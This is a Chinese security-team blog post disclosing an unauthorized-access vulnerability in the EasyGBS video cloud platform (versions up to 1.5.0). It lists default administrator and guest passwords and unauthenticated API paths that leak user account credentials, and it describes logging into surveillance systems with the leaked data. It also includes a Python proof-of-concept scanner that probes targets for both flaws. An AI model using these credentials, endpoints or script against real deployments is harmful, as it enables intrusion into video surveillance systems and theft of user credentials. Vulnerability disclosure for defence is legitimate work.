EasyGBS国标视频云平台未授权访问漏洞

  • A+
所属分类:安全文章

00


前言


    前段时间做项目,发现不少机构单位使用“EasyGBS”来做云监控平台系统。产品使用范围分布如下图所示:


EasyGBS国标视频云平台未授权访问漏洞


01


漏洞详情


    EasyGBS是由TSINGSEE开发一款国标视频云平台。EasyGBS流媒体服务器提供流转发服务,负责将GB28181设备/平台推送的PS流转成ES流,然后提供RTSP、RTMP、FLV、HLS多种格式进行分发,实现web浏览器、手机浏览器、微信、PC客户端等各种终端无插件播放。EasyGBS<=1.5.0版本的平台存在未授权访问漏洞,攻击者可以直接访问平台的API接口文档,从而获取系统的API接口造成信息泄露。


漏洞影响:EasyGBD <= 1.5.0


02

漏洞利用


1、默认口令:

easygbs/easygbs  #  管理员权限guest2020/guest2014&2020  #  游客权限

2、API接口文档:/apidoc/#api-device

EasyGBS国标视频云平台未授权访问漏洞

3、用户账户密码信息泄露:/api/v1/userlist?pageindex=0&pagesize=10

EasyGBS国标视频云平台未授权访问漏洞

4、利用泄露的用户信息,登陆视频监控系统:

EasyGBS国标视频云平台未授权访问漏洞

EasyGBS国标视频云平台未授权访问漏洞

5、POC脚本:

import requestsfrom bs4 import BeautifulSoupimport sys
'''EasyGBS未授权漏洞,验证脚本。by——jammny'''
def check_poc(result): bf = BeautifulSoup(result.text, 'lxml') list_1 = bf.find_all('div', class_='spinner') if list_1: return True else: return False
def check_poc_2(result): if "UserList" in result.text: return True else: return False
class Scan(): def poc(self, url): payload_1 = r'/apidoc/#api-device' payload_2 = r'/api/v1/userlist?pageindex=0&pagesize=10' headers = { 'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", } try: result_1 = requests.get(url + payload_1, headers=headers) result_2 = requests.get(url + payload_2, headers=headers) if result_1.status_code == 200 and check_poc(result_1): result = { 0: "[+] 存在EasyGBS未授权访问漏洞!", 1: "[+] API文档地址:{}".format(url + payload_1), } if result_2.status_code == 200 and check_poc_2(result_2): result[2] = "[+] 发现用户信息泄露:{}".format(url + payload_2) else: if result_2.status_code == 200 and check_poc_2(result_2): result = {0: "[+] 存在EasyGBS未授权访问漏洞!"} result[1] = "[+] 发现用户信息泄露:{}".format(url + payload_2) else: result = {0: "[-] 不存在EasyGBS未授权访问漏洞!"} return result except: return {0: "[-] 可能不存在EasyGBS未授权访问漏洞!"}
def exp(self, url): pass
if __name__ == "__main__": url = sys.argv[1] #type = sys.argv[1] type = 'poc' scan = Scan() if type == 'poc': result = scan.poc(url) else: result = scan.exp(url)    print(result)

6、利用JWS进行漏洞检测:

EasyGBS国标视频云平台未授权访问漏洞


03


后记


    这是Fighter安全团队的第 18 文章,“学渣成长之路”正式更名为“Fighter”安全团队,Fighter的背后是一个积极向上、永不言弃的大学生群体。也欢迎更多的小伙伴来加入Fighter,一起交流、成长进步。而JWS是一款可自定义扩展功能的开源的渗透系统,目前更多功能还在研发和内测中。有更好的想法的伙伴也可以加入Fighter,一起参与研发。

本文始发于微信公众号(Fighter安全团队):EasyGBS国标视频云平台未授权访问漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: